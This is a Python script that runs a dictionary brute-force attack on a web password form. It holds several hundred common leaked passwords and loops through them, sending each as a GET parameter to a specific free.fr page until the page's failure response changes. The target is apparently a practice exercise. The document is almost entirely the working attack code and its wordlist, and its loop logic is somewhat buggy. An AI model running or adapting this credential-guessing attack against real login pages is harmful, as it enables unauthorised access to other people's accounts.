import requests
compt = 0
mdps=[{'123456': '12345'},
 {'123456': '123456789'},
 {'123456': 'password'},
 {'123456': 'iloveyou'},
 {'123456': 'princess'},
 {'123456': '1234567'},
 {'123456': 'rockyou'},
 {'123456': '12345678'},
 {'123456': 'abc123'},
 {'123456': 'nicole'},
 {'123456': 'daniel'},
 {'123456': 'babygirl'},
 {'123456': 'monkey'},
 {'123456': 'lovely'},
 {'123456': 'jessica'},
 {'123456': '654321'},
 {'123456': 'michael'},
 {'123456': 'ashley'},
 {'123456': 'qwerty'},
 {'123456': '111111'},
 {'123456': 'iloveu'},
 {'123456': '0'},
 {'123456': 'michelle'},
 {'123456': 'tigger'},
 {'123456': 'sunshine'},
 {'123456': 'chocolate'},
 {'123456': 'password1'},
 {'123456': 'soccer'},
 {'123456': 'anthony'},
 {'123456': 'friends'},
 {'123456': 'butterfly'},
 {'123456': 'purple'},
 {'123456': 'angel'},
 {'123456': 'jordan'},
 {'123456': 'liverpool'},
 {'123456': 'justin'},
 {'123456': 'loveme'},
 {'123456': 'fuckyou'},
 {'123456': '123123'},
 {'123456': 'football'},
 {'123456': 'secret'},
 {'123456': 'andrea'},
 {'123456': 'carlos'},
 {'123456': 'jennifer'},
 {'123456': 'joshua'},
 {'123456': 'bubbles'},
 {'123456': '1234567890'},
 {'123456': 'superman'},
 {'123456': 'hannah'},
 {'123456': 'amanda'},
 {'123456': 'loveyou'},
 {'123456': 'pretty'},
 {'123456': 'basketball'},
 {'123456': 'andrew'},
 {'123456': 'angels'},
 {'123456': 'tweety'},
 {'123456': 'flower'},
 {'123456': 'playboy'},
 {'123456': 'hello'},
 {'123456': 'elizabeth'},
 {'123456': 'hottie'},
 {'123456': 'tinkerbell'},
 {'123456': 'charlie'},
 {'123456': 'samantha'},
 {'123456': 'barbie'},
 {'123456': 'chelsea'},
 {'123456': 'lovers'},
 {'123456': 'teamo'},
 {'123456': 'jasmine'},
 {'123456': 'brandon'},
 {'123456': '666666'},
 {'123456': 'shadow'},
 {'123456': 'melissa'},
 {'123456': 'eminem'},
 {'123456': 'matthew'},
 {'123456': 'robert'},
 {'123456': 'danielle'},
 {'123456': 'forever'},
 {'123456': 'family'},
 {'123456': 'jonathan'},
 {'123456': '987654321'},
 {'123456': 'computer'},
 {'123456': 'whatever'},
 {'123456': 'dragon'},
 {'123456': 'vanessa'},
 {'123456': 'cookie'},
 {'123456': 'naruto'},
 {'123456': 'summer'},
 {'123456': 'sweety'},
 {'123456': 'spongebob'},
 {'123456': 'joseph'},
 {'123456': 'junior'},
 {'123456': 'softball'},
 {'123456': 'taylor'},
 {'123456': 'yellow'},
 {'123456': 'daniela'},
 {'123456': 'lauren'},
 {'123456': 'mickey'},
 {'123456': 'princesa'},
 {'123456': 'alexandra'},
 {'123456': 'alexis'},
 {'123456': 'jesus'},
 {'123456': 'estrella'},
 {'123456': 'miguel'},
 {'123456': 'william'},
 {'123456': 'thomas'},
 {'123456': 'beautiful'},
 {'123456': 'mylove'},
 {'123456': 'angela'},
 {'123456': 'poohbear'},
 {'123456': 'patrick'},
 {'123456': 'iloveme'},
 {'123456': 'sakura'},
 {'123456': 'adrian'},
 {'123456': 'alexander'},
 {'123456': 'destiny'},
 {'123456': 'christian'},
 {'123456': '121212'},
 {'123456': 'sayang'},
 {'123456': 'america'},
 {'123456': 'dancer'},
 {'123456': 'monica'},
 {'123456': 'richard'},
 {'123456': '112233'},
 {'123456': 'princess1'},
 {'123456': '555555'},
 {'123456': 'diamond'},
 {'123456': 'carolina'},
 {'123456': 'steven'},
 {'123456': 'rangers'},
 {'123456': 'louise'},
 {'123456': 'orange'},
 {'123456': '789456'},
 {'123456': '999999'},
 {'123456': 'shorty'},
 {'123456': '11111'},
 {'123456': 'nathan'},
 {'123456': 'snoopy'},
 {'123456': 'gabriel'},
 {'123456': 'hunter'},
 {'123456': 'cherry'},
 {'123456': 'killer'},
 {'123456': 'sandra'},
 {'123456': 'alejandro'},
 {'123456': 'buster'},
 {'123456': 'george'},
 {'123456': 'brittany'},
 {'123456': 'alejandra'},
 {'123456': 'patricia'},
 {'123456': 'rachel'},
 {'123456': 'tequiero'},
 {'123456': '7777777'},
 {'123456': 'cheese'},
 {'123456': '159753'},
 {'123456': 'arsenal'},
 {'123456': 'dolphin'},
 {'123456': 'antonio'},
 {'123456': 'heather'},
 {'123456': 'david'},
 {'123456': 'ginger'},
 {'123456': 'stephanie'},
 {'123456': 'peanut'},
 {'123456': 'blink182'},
 {'123456': 'sweetie'},
 {'123456': '222222'},
 {'123456': 'beauty'},
 {'123456': '987654'},
 {'123456': 'victoria'},
 {'123456': 'honey'},
 {'123456': '0'},
 {'123456': 'fernando'},
 {'123456': 'pokemon'},
 {'123456': 'maggie'},
 {'123456': 'corazon'},
 {'123456': 'chicken'},
 {'123456': 'pepper'},
 {'123456': 'cristina'},
 {'123456': 'rainbow'},
 {'123456': 'kisses'},
 {'123456': 'manuel'},
 {'123456': 'myspace'},
 {'123456': 'rebelde'},
 {'123456': 'angel1'},
 {'123456': 'ricardo'},
 {'123456': 'babygurl'},
 {'123456': 'heaven'},
 {'123456': '55555'},
 {'123456': 'baseball'},
 {'123456': 'martin'},
 {'123456': 'greenday'},
 {'123456': 'november'},
 {'123456': 'alyssa'},
 {'123456': 'madison'},
 {'123456': 'mother'},
 {'123456': '123321'},
 {'123456': '123abc'},
 {'123456': 'mahalkita'},
 {'123456': 'batman'},
 {'123456': 'september'},
 {'123456': 'december'},
 {'123456': 'morgan'},
 {'123456': 'mariposa'},
 {'123456': 'maria'},
 {'123456': 'gabriela'},
 {'123456': 'iloveyou2'},
 {'123456': 'bailey'},
 {'123456': 'jeremy'},
 {'123456': 'pamela'},
 {'123456': 'kimberly'},
 {'123456': 'gemini'},
 {'123456': 'shannon'},
 {'123456': 'pictures'},
 {'123456': 'asshole'},
 {'123456': 'sophie'},
 {'123456': 'jessie'},
 {'123456': 'hellokitty'},
 {'123456': 'claudia'},
 {'123456': 'babygirl1'},
 {'123456': 'angelica'},
 {'123456': 'austin'},
 {'123456': 'mahalko'},
 {'123456': 'victor'},
 {'123456': 'horses'},
 {'123456': 'tiffany'},
 {'123456': 'mariana'},
 {'123456': 'eduardo'},
 {'123456': 'andres'},
 {'123456': 'courtney'},
 {'123456': 'booboo'},
 {'123456': 'kissme'},
 {'123456': 'harley'},
 {'123456': 'ronaldo'},
 {'123456': 'iloveyou1'},
 {'123456': 'precious'},
 {'123456': 'october'},
 {'123456': 'inuyasha'},
 {'123456': 'peaches'},
 {'123456': 'veronica'},
 {'123456': 'chris'},
 {'123456': '888888'},
 {'123456': 'adriana'},
 {'123456': 'cutie'},
 {'123456': 'james'},
 {'123456': 'banana'},
 {'123456': 'prince'},
 {'123456': 'friend'},
 {'123456': 'jesus1'},
 {'123456': 'crystal'},
 {'123456': 'celtic'},
 {'123456': 'zxcvbnm'},
 {'123456': 'edward'},
 {'123456': 'oliver'},
 {'123456': 'diana'},
 {'123456': 'samsung'},
 {'123456': 'freedom'},
 {'123456': 'angelo'},
 {'123456': 'kenneth'},
 {'123456': 'master'},
 {'123456': 'scooby'},
 {'123456': 'carmen'},
 {'123456': '456789'},
 {'123456': 'sebastian'},
 {'123456': 'rebecca'},
 {'123456': 'jackie'},
 {'123456': 'spiderman'},
 {'123456': 'christopher'},
 {'123456': 'karina'},
 {'123456': 'johnny'},
 {'123456': 'hotmail'},
 {'123456': '123456789'},
 {'123456': 'school'},
 {'123456': 'barcelona'},
 {'123456': 'august'},
 {'123456': 'orlando'},
 {'123456': 'samuel'},
 {'123456': 'cameron'},
 {'123456': 'slipknot'},
 {'123456': 'cutiepie'},
 {'123456': 'monkey1'},
 {'123456': '50cent'},
 {'123456': 'bonita'},
 {'123456': 'kevin'},
 {'123456': 'bitch'},
 {'123456': 'maganda'},
 {'123456': 'babyboy'},
 {'123456': 'casper'},
 {'123456': 'brenda'},
 {'123456': 'adidas'},
 {'123456': 'kitten'},
 {'123456': 'karen'},
 {'123456': 'mustang'},
 {'123456': 'isabel'},
 {'123456': 'natalie'},
 {'123456': 'cuteako'},
 {'123456': 'javier'},
 {'123456': '789456123'},
 {'123456': '123654'},
 {'123456': 'sarah'},
 {'123456': 'bowwow'},
 {'123456': 'portugal'},
 {'123456': 'laura'},
 {'123456': '777777'},
 {'123456': 'marvin'},
 {'123456': 'denise'},
 {'123456': 'tigers'},
 {'123456': 'volleyball'},
 {'123456': 'jasper'},
 {'123456': 'rockstar'},
 {'123456': 'january'},
 {'123456': 'fuckoff'},
 {'123456': 'alicia'},
 {'123456': 'nicholas'},
 {'123456': 'flowers'},
 {'123456': 'cristian'},
 {'123456': 'tintin'},
 {'123456': 'bianca'},
 {'123456': 'chrisbrown'},
 {'123456': 'chester'},
 {'123456': '101010'},
 {'123456': 'smokey'},
 {'123456': 'silver'},
 {'123456': 'internet'},
 {'123456': 'sweet'},
 {'123456': 'strawberry'},
 {'123456': 'garfield'},
 {'123456': 'dennis'},
 {'123456': 'panget'},
 {'123456': 'francis'},
 {'123456': 'cassie'},
 {'123456': 'benfica'},
 {'123456': 'love123'},
 {'123456': '696969'},
 {'123456': 'asdfgh'},
 {'123456': 'lollipop'},
 {'123456': 'olivia'},
 {'123456': 'cancer'},
 {'123456': 'camila'},
 {'123456': 'qwertyuiop'},
 {'123456': 'superstar'},
 {'123456': 'harrypotter'},
 {'123456': 'ihateyou'},
 {'123456': 'charles'},
 {'123456': 'monique'},
 {'123456': 'midnight'},
 {'123456': 'vincent'},
 {'123456': 'christine'},
 {'123456': 'apples'},
 {'123456': 'scorpio'},
 {'123456': 'jordan23'},
 {'123456': 'lorena'},
 {'123456': 'andreea'},
 {'123456': 'mercedes'},
 {'123456': 'katherine'},
 {'123456': 'charmed'},
 {'123456': 'abigail'},
 {'123456': 'rafael'},
 {'123456': 'icecream'},
 {'123456': 'mexico'},
 {'123456': 'brianna'},
 {'123456': 'nirvana'},
 {'123456': 'aaliyah'},
 {'123456': 'pookie'},
 {'123456': 'johncena'},
 {'123456': 'lovelove'},
 {'123456': 'fucker'},
 {'123456': 'abcdef'},
 {'123456': 'benjamin'},
 {'123456': '131313'},
 {'123456': 'gangsta'},
 {'123456': 'brooke'},
 {'123456': '333333'},
 {'123456': 'hiphop'},
 {'123456': 'aaaaaa'},
 {'123456': 'mybaby'},
 {'123456': 'sergio'},
 {'123456': 'welcome'},
 {'123456': 'metallica'},
 {'123456': 'julian'},
 {'123456': 'travis'},
 {'123456': 'myspace1'},
 {'123456': 'babyblue'},
 {'123456': 'sabrina'},
 {'123456': 'michael1'},
 {'123456': 'jeffrey'},
 {'123456': 'stephen'},
 {'123456': 'love'},
 {'123456': 'dakota'},
 {'123456': 'catherine'},
 {'123456': 'badboy'},
 {'123456': 'fernanda'},
 {'123456': 'westlife'},
 {'123456': 'blondie'},
 {'123456': 'sasuke'},
 {'123456': 'smiley'},
 {'123456': 'jackson'},
 {'123456': 'simple'},
 {'123456': 'melanie'},
 {'123456': 'steaua'},
 {'123456': 'dolphins'},
 {'123456': 'roberto'},
 {'123456': 'fluffy'},
 {'123456': 'teresa'},
 {'123456': 'piglet'},
 {'123456': 'ronald'},
 {'123456': 'slideshow'},
 {'123456': 'asdfghjkl'},
 {'123456': 'minnie'},
 {'123456': 'newyork'},
 {'123456': 'jason'},
 {'123456': 'raymond'},
 {'123456': 'santiago'},
 {'123456': 'jayson'},
 {'123456': '88888888'},
 {'123456': '5201314'},
 {'123456': 'jerome'},
 {'123456': 'gandako'},
 {'123456': 'muffin'},
 {'123456': 'gatita'},
 {'123456': 'babyko'},
 {'123456': '246810'},
 {'123456': 'sweetheart'},
 {'123456': 'chivas'},
 {'123456': 'ladybug'},
 {'123456': 'kitty'},
 {'123456': 'popcorn'},
 {'123456': 'alberto'},
 {'123456': 'valeria'},
 {'123456': 'cookies'},
 {'123456': 'leslie'},
 {'123456': 'jenny'},
 {'123456': 'nicole1'},
 {'123456': '12345678910'},
 {'123456': 'leonardo'},
 {'123456': 'jayjay'},
 {'123456': 'liliana'},
 {'123456': 'dexter'},
 {'123456': 'sexygirl'},
 {'123456': '232323'},
 {'123456': 'amores'},
 {'123456': 'rockon'},
 {'123456': 'christ'},
 {'123456': 'babydoll'},
 {'123456': 'anthony1'},
 {'123456': 'marcus'},
 {'123456': 'bitch1'},
 {'123456': 'fatima'},
 {'123456': 'miamor'},
 {'123456': 'lover'},
 {'123456': 'chris1'},
 {'123456': 'single'},
 {'123456': 'eeyore'},
 {'123456': 'lalala'},
 {'123456': '252525'},
 {'123456': 'scooter'},
 {'123456': 'natasha'},
 {'123456': 'skittles'},
 {'123456': 'brooklyn'},
 {'123456': 'colombia'},
 {'123456': '159357'},
 {'123456': 'teddybear'},
 {'123456': 'winnie'},
 {'123456': 'happy'},
 {'123456': 'manutd'},
 {'123456': '123456a'},
 {'123456': 'britney'},
 {'123456': 'katrina'},
 {'123456': 'christina'},
 {'123456': 'pasaway'},
 {'123456': 'cocacola'},
 {'123456': 'mahal'},
 {'123456': 'grace'},
 {'123456': 'linda'},
 {'123456': 'albert'},
 {'123456': 'tatiana'},
 {'123456': 'london'},
 {'123456': 'cantik'},
 {'123456': '123456'},
 {'123456': 'lakers'},
 {'123456': 'marie'},
 {'123456': 'teiubesc'},
 {'123456': '147258369'},
 {'123456': 'charlotte'},
 {'123456': 'natalia'},
 {'123456': 'francisco'},
 {'123456': 'amorcito'},
 {'123456': 'smile'},
 {'123456': 'paola'},
 {'123456': 'angelito'},
 {'123456': 'manchester'},
 {'123456': 'hahaha'},
 {'123456': 'elephant'},
 {'123456': 'mommy1'},
 {'123456': 'shelby'},
 {'123456': '147258'},
 {'123456': 'kelsey'},
 {'123456': 'genesis'},
 {'123456': 'amigos'},
 {'123456': 'snickers'},
 {'123456': 'xavier'},
 {'123456': 'turtle'},
 {'123456': 'marlon'},
 {'123456': 'linkinpark'},
 {'123456': 'claire'},
 {'123456': 'stupid'},
 {'123456': '147852'},
 {'123456': 'marina'},
 {'123456': 'garcia'},
 {'123456': 'fuckyou1'},
 {'123456': 'diego'},
 {'123456': 'brandy'},
 {'123456': 'letmein'},
 {'123456': 'hockey'},
 {'123456': '444444'},
 {'123456': 'sharon'},
 {'123456': 'bonnie'},
 {'123456': 'spider'},
 {'123456': 'iverson'},
 {'123456': 'andrei'},
 {'123456': 'justine'},
 {'123456': 'frankie'},
 {'123456': 'pimpin'},
 {'123456': 'disney'},
 {'123456': 'rabbit'},
 {'123456': '54321'},
 {'123456': 'fashion'},
 {'123456': 'soccer1'},
 {'123456': 'red123'},
 {'123456': 'bestfriend'},
 {'123456': 'england'},
 {'123456': 'hermosa'},
 {'123456': '456123'},
 {'123456': 'qazwsx'},
 {'123456': 'bandit'},
 {'123456': 'danny'},
 {'123456': 'allison'},
 {'123456': 'emily'},
 {'123456': '102030'},
 {'123456': 'lucky1'},
 {'123456': 'sporting'},
 {'123456': 'miranda'},
 {'123456': 'dallas'},
 {'123456': 'hearts'},
 {'123456': 'camille'},
 {'123456': 'wilson'},
 {'123456': 'potter'},
 {'123456': 'pumpkin'},
 {'123456': 'iloveu2'},
 {'123456': 'number1'},
 {'123456': 'katie'},
 {'123456': 'guitar'},
 {'123456': '212121'},
 {'123456': 'truelove'},
 {'123456': 'jayden'},
 {'123456': 'savannah'},
 {'123456': 'hottie1'},
 {'123456': 'phoenix'},
 {'123456': 'monster'},
 {'123456': 'player'},
 {'123456': 'ganda'},
 {'123456': 'people'},
 {'123456': 'scotland'},
 {'123456': 'nelson'},
 {'123456': 'jasmin'},
 {'123456': 'timothy'},
 {'123456': 'onelove'},
 {'123456': 'ilovehim'},
 {'123456': 'shakira'},
 {'123456': 'estrellita'},
 {'123456': 'bubble'},
 {'123456': 'smiles'},
 {'123456': 'brandon1'},
 {'123456': 'sparky'},
 {'123456': 'barney'},
 {'123456': 'sweets'},
 {'123456': 'parola'},
 {'123456': 'evelyn'},
 {'123456': 'familia'},
 {'123456': 'love12'},
 {'123456': 'nikki'},
 {'123456': 'motorola'},
 {'123456': 'florida'},
 {'123456': 'omarion'},
 {'123456': 'monkeys'},
 {'123456': 'loverboy'},
 {'123456': 'elijah'},
 {'123456': 'joanna'},
 {'123456': 'canada'},
 {'123456': 'ronnie'},
 {'123456': 'mamita'},
 {'123456': 'emmanuel'},
 {'123456': 'thunder'},
 {'123456': '999999999'},
 {'123456': 'broken'},
 {'123456': 'rodrigo'},
 {'123456': 'maryjane'},
 {'123456': 'westside'},
 {'123456': 'california'},
 {'123456': 'lucky'},
 {'123456': 'mauricio'},
 {'123456': 'yankees'},
 {'123456': 'jackass'},
 {'123456': 'jamaica'},
 {'123456': 'justin1'},
 {'123456': 'amigas'},
 {'123456': 'preciosa'},
 {'123456': 'shopping'},
 {'123456': 'flores'},
 {'123456': 'mariah'},
 {'123456': 'matrix'},
 {'123456': 'isabella'},
 {'123456': 'tennis'},
 {'123456': 'trinity'},
 {'123456': 'jorge'},
 {'123456': 'sunflower'},
 {'123456': 'kathleen'},
 {'123456': 'bradley'},
 {'123456': 'cupcake'},
 {'123456': 'hector'},
 {'123456': 'martinez'},
 {'123456': 'elaine'},
 {'123456': 'robbie'},
 {'123456': 'friendster'},
 {'123456': 'cheche'},
 {'123456': 'gracie'},
 {'123456': 'connor'},
 {'123456': 'hello1'},
 {'123456': 'valentina'},
 {'123456': 'melody'},
 {'123456': 'darling'},
 {'123456': 'sammy'},
 {'123456': 'jamie'},
 {'123456': 'santos'},
 {'123456': 'abcdefg'},
 {'123456': 'joanne'},
 {'123456': 'candy'},
 {'123456': 'fuckyou2'},
 {'123456': 'loser'},
 {'123456': 'dominic'},
 {'123456': 'pebbles'},
 {'123456': 'sunshine1'},
 {'123456': 'swimming'},
 {'123456': 'millie'},
 {'123456': 'loving'},
 {'123456': 'gangster'},
 {'123456': 'blessed'},
 {'123456': 'compaq'},
 {'123456': 'taurus'},
 {'123456': 'gloria'},
 {'123456': 'tyler'},
 {'123456': 'aaron'},
 {'123456': 'darkangel'},
 {'123456': 'kitkat'},
 {'123456': 'megan'},
 {'123456': 'dreams'},
 {'123456': 'sweetpea'},
 {'123456': 'bettyboop'},
 {'123456': 'jessica1'},
 {'123456': 'cynthia'},
 {'123456': 'cheyenne'},
 {'123456': 'ferrari'},
 {'123456': 'dustin'},
 {'123456': 'iubire'},
 {'123456': 'a123456'},
 {'123456': 'snowball'},
 {'123456': 'purple1'},
 {'123456': 'violet'},
 {'123456': 'darren'},
 {'123456': 'starwars'},
 {'123456': 'bestfriends'},
 {'123456': 'inlove'},
 {'123456': 'kelly'},
 {'123456': 'batista'},
 {'123456': 'karla'},
 {'123456': 'sophia'},
 {'123456': 'chacha'},
 {'123456': 'biteme'},
 {'123456': 'marian'},
 {'123456': 'sydney'},
 {'123456': 'sexyme'},
 {'123456': 'pogiako'},
 {'123456': 'gerald'},
 {'123456': 'jordan1'},
 {'123456': '10203'},
 {'123456': 'daddy1'},
 {'123456': 'zachary'},
 {'123456': 'daddysgirl'},
 {'123456': 'billabong'},
 {'123456': 'carebear'},
 {'123456': 'froggy'},
 {'123456': 'pinky'},
 {'123456': 'erika'},
 {'123456': 'oscar'},
 {'123456': 'skater'},
 {'123456': 'raiders'},
 {'123456': 'nenita'},
 {'123456': 'tigger1'},
 {'123456': 'ashley1'},
 {'123456': 'charlie1'},
 {'123456': 'gatito'},
 {'123456': 'lokita'},
 {'123456': 'maldita'},
 {'123456': 'buttercup'},
 {'123456': 'nichole'},
 {'123456': 'bambam'},
 {'123456': 'nothing'},
 {'123456': 'glitter'},
 {'123456': 'bella'},
 {'123456': 'amber'},
 {'123456': 'apple'},
 {'123456': '123789'},
 {'123456': 'sister'},
 {'123456': 'zacefron'},
 {'123456': 'tokiohotel'},
 {'123456': 'loveya'},
 {'123456': 'lindsey'},
 {'123456': 'money'},
 {'123456': 'lovebug'},
 {'123456': 'bubblegum'},
 {'123456': 'marissa'},
 {'123456': 'dreamer'},
 {'123456': 'darkness'},
 {'123456': 'cecilia'},
 {'123456': 'lollypop'},
 {'123456': 'nicolas'},
 {'123456': 'google'},
 {'123456': 'lindsay'},
 {'123456': 'cooper'},
 {'123456': 'passion'},
 {'123456': 'kristine'},
 {'123456': 'green'},
 {'123456': 'puppies'},
 {'123456': 'ariana'},
 {'123456': 'fuckme'},
 {'123456': 'chubby'},
 {'123456': 'raquel'},
 {'123456': 'lonely'},
 {'123456': 'anderson'},
 {'123456': 'sammie'},
 {'123456': 'sexybitch'},
 {'123456': 'mario'},
 {'123456': 'butter'},
 {'123456': 'willow'},
 {'123456': 'roxana'},
 {'123456': 'mememe'},
 {'123456': 'caroline'},
 {'123456': 'susana'},
 {'123456': 'kristen'},
 {'123456': 'baller'},
 {'123456': 'hotstuff'},
 {'123456': 'carter'},
 {'123456': 'stacey'},
 {'123456': 'babylove'},
 {'123456': 'angelina'},
 {'123456': 'miller'},
 {'123456': 'scorpion'},
 {'123456': 'sierra'},
 {'123456': 'playgirl'},
 {'123456': 'sweet16'},
 {'123456': '12345'},
 {'123456': 'rocker'},
 {'123456': 'bhebhe'},
 {'123456': 'gustavo'},
 {'123456': 'marcos'},
 {'123456': 'chance'},
 {'123456': '123qwe'},
 {'123456': 'kayla'},
 {'123456': 'james1'},
 {'123456': 'football1'},
 {'123456': 'eagles'},
 {'123456': 'loveme1'},
 {'123456': 'milagros'},
 {'123456': 'stella'},
 {'123456': 'lilmama'},
 {'123456': 'beyonce'},
 {'123456': 'lovely1'},
 {'123456': 'rocky'},
 {'123456': 'daddy'},
 {'123456': 'catdog'},
 {'123456': 'armando'},
 {'123456': 'margarita'},
 {'123456': '151515'},
 {'123456': 'loves'},
 {'123456': 'lolita'},
 {'123456': '202020'},
 {'123456': 'gerard'},
 {'123456': 'undertaker'},
 {'123456': 'amistad'},
 {'123456': 'williams'},
 {'123456': 'qwerty1'},
 {'123456': 'freddy'},
 {'123456': 'capricorn'},
 {'123456': 'caitlin'},
 {'123456': 'bryan'},
 {'123456': 'delfin'},
 {'123456': 'dance'},
 {'123456': 'cheerleader'},
 {'123456': 'password2'},
 {'123456': 'PASSWORD'},
 {'123456': 'martha'},
 {'123456': 'lizzie'},
 {'123456': 'georgia'},
 {'123456': 'matthew1'},
 {'123456': 'enrique'},
 {'123456': 'zxcvbn'},
 {'123456': 'badgirl'},
 {'123456': 'andrew1'},
 {'123456': '141414'},
 {'123456': '11111111'},
 {'123456': 'dancing'},
 {'123456': 'cuteme'},
 {'123456': 'booger'},
 {'123456': 'amelia'},
 {'123456': 'vampire'},
 {'123456': 'skyline'},
 {'123456': 'chiquita'},
 {'123456': 'angeles'},
 {'123456': 'scoobydoo'},
 {'123456': 'janine'},
 {'123456': 'tamara'},
 {'123456': 'carlitos'},
 {'123456': 'money1'},
 {'123456': 'sheila'},
 {'123456': 'justme'},
 {'123456': 'ireland'},
 {'123456': 'kittycat'},
 {'123456': 'hotdog'},
 {'123456': 'yamaha'},
 {'123456': 'tristan'},
 {'123456': 'harvey'},
 {'123456': 'israel'},
 {'123456': 'legolas'},
 {'123456': 'michelle1'},
 {'123456': 'maddie'},
 {'123456': 'angie'},
 {'123456': 'cinderella'},
 {'123456': 'jesuschrist'},
 {'123456': 'lester'},
 {'123456': 'ashton'},
 {'123456': 'ilovejesus'},
 {'123456': 'tazmania'},
 {'123456': 'remember'},
 {'123456': 'xxxxxx'},
 {'123456': 'tekiero'},
 {'123456': 'thebest'},
 {'123456': 'princesita'},
 {'123456': 'lucky7'},
 {'123456': 'jesucristo'},
 {'123456': 'peewee'},
 {'123456': 'paloma'},
 {'123456': 'buddy1'},
 {'123456': 'deedee'},
 {'123456': 'miriam'},
 {'123456': 'april'},
 {'123456': 'patches'},
 {'123456': 'regina'},
 {'123456': 'janice'},
 {'123456': 'cowboys'},
 {'123456': 'myself'},
 {'123456': 'lipgloss'},
 {'123456': 'jazmin'},
 {'123456': 'rosita'},
 {'123456': 'happy1'},
 {'123456': 'felipe'},
 {'123456': 'chichi'},
 {'123456': 'pangit'},
 {'123456': 'mierda'},
 {'123456': 'genius'},
 {'123456': '741852963'},
 {'123456': 'hernandez'},
 {'123456': 'awesome'},
 {'123456': 'walter'},
 {'123456': 'tinker'},
 {'123456': 'arturo'},
 {'123456': 'silvia'},
 {'123456': 'melvin'},
 {'123456': 'celeste'},
 {'123456': 'pussycat'},
 {'123456': 'gorgeous'},
 {'123456': 'david1'},
 {'123456': 'molly'},
 {'123456': 'honeyko'},
 {'123456': 'mylife'},
 {'123456': 'animal'},
 {'123456': 'penguin'},
 {'123456': 'babyboo'},
 {'123456': 'loveu'},
 {'123456': 'simpsons'},
 {'123456': 'lupita'},
 {'123456': 'boomer'},
 {'123456': 'panthers'},
 {'123456': 'hollywood'},
 {'123456': 'alfredo'},
 {'123456': 'musica'},
 {'123456': 'johnson'},
 {'123456': 'ilovegod'},
 {'123456': 'hawaii'},
 {'123456': 'sparkle'},
 {'123456': 'kristina'},
 {'123456': 'sexymama'},
 {'123456': 'crazy'},
 {'123456': 'valerie'},
 {'123456': 'spencer'},
 {'123456': 'scarface'},
 {'123456': 'hardcore'},
 {'123456': '98765'},
 {'123456': '0'},
 {'123456': 'winter'},
 {'123456': 'hailey'},
 {'123456': 'trixie'},
 {'123456': 'hayden'},
 {'123456': 'micheal'},
 {'123456': 'wesley'},
 {'123456': '242424'},
 {'123456': '987654321'},
 {'123456': 'marisol'},
 {'123456': 'nikita'},
 {'123456': 'daisy'},
 {'123456': 'jeremiah'},
 {'123456': 'pineapple'},
 {'123456': 'mhine'},
 {'123456': 'isaiah'},
 {'123456': 'christmas'},
 {'123456': 'cesar'},
 {'123456': 'lolipop'},
 {'123456': 'butterfly1'},
 {'123456': 'chloe'},
 {'123456': 'lawrence'},
 {'123456': 'xbox360'},
 {'123456': 'sheena'},
 {'123456': 'murphy'},
 {'123456': 'madalina'},
 {'123456': 'anamaria'},
 {'123456': 'gateway'},
 {'123456': 'debbie'},
 {'123456': 'yourmom'},
 {'123456': 'blonde'},
 {'123456': 'jasmine1'},
 {'123456': 'please'},
 {'123456': 'bubbles1'},
 {'123456': 'jimmy'},
 {'123456': 'beatriz'},
 {'123456': 'poopoo'},
 {'123456': 'diamonds'},
 {'123456': 'whitney'},
 {'123456': 'friendship'},
 {'123456': 'sweetness'},
 {'123456': 'pauline'},
 {'123456': 'desiree'},
 {'123456': 'trouble'},
 {'123456': '741852'},
 {'123456': 'united'},
 {'123456': 'marley'},
 {'123456': 'brian'},
 {'123456': 'barbara'},
 {'123456': 'hannah1'},
 {'123456': 'bananas'},
 {'123456': 'julius'},
 {'123456': 'leanne'},
 {'123456': 'sandy'},
 {'123456': 'marie1'},
 {'123456': 'anita'},
 {'123456': 'lover1'},
 {'123456': 'chicago'},
 {'123456': 'twinkle'},
 {'123456': 'pantera'},
 {'123456': 'february'},
 {'123456': 'birthday'},
 {'123456': 'shadow1'},
 {'123456': 'qwert'},
 {'123456': 'bebita'},
 {'123456': '87654321'},
 {'123456': 'twilight'},
 {'123456': 'imissyou'},
 {'123456': 'pollito'},
 {'123456': 'ashlee'},
 {'123456': 'tucker'},
 {'123456': 'cookie1'},
 {'123456': 'shelly'},
 {'123456': 'catalina'},
 {'123456': '147852369'},
 {'123456': 'beckham'},
 {'123456': 'simone'},
 {'123456': 'nursing'},
 {'123456': 'iloveyou!'},
 {'123456': 'eugene'},
 {'123456': 'torres'},
 {'123456': 'damian'},
 {'123456': '123123123'},
 {'123456': 'joshua1'},
 {'123456': 'bobby'},
 {'123456': 'babyface'},
 {'123456': 'andre'},
 {'123456': 'donald'},
 {'123456': 'daniel1'},
 {'123456': 'panther'},
 {'123456': 'dinamo'},
 {'123456': 'mommy'},
 {'123456': 'juliana'},
 {'123456': 'cassandra'}]
p = requests.get("http://monsieur.k2000.free.fr/exercice/acces.php")
for i in range(len(mdps)):
  while p.content == b'<!doctype html> \r\n<html lang="fr"> \r\n\t<head> \r\n\t\t<meta charset="utf-8"> \r\n        <title>Mon formulaire</title>\r\n        <link rel="stylesheet" href="css/style.css" />\r\n\t</head> \r\n\t<body>\r\n    <p>Ah ah ah vous n\'avez pas trouv\xc3\xa9 le mot magique </p>\r\n        <img src=\'img/MdPFail.gif\' />\r\n        <audio  autoplay loop>\r\n        <source src=\'son/magicword.mp3\' type=\'audio/mp3\' />\r\n        </audio>    </body>\r\n</html>':
    mdp = [i['123456'] for i in mdps]
    print(mdp[i])
    p = requests.get("http://monsieur.k2000.free.fr/exercice/acces.php?mot_de_passe="+mdp[i])
    i=i+1
    compt+=1
    print(compt)
